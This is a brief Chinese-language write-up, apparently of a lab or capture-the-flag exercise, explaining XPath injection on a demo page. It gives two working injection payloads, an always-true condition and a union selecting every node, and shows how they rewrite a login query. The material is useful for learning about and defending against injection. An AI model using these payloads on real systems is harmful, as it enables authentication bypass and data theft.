网站网址为 /demo.php?name=xml ,可能存在XPath漏洞
XPath中典型的查询语句如下:
//users/user[loginID/text()='xyz'and password/text()='123test']
在网址最后面加上 ' or 1=1 or ''=' 或者 ']|//*|//*[',秒解
' or 1=1 or ''='
查询语句最终会变成如下代码:
//users/user[loginID/text()=''or 1=1 or ''='' and password/text()='' or 1=1 or ''='']
']|//*|//*['
xpath语法,访问xml的所有节点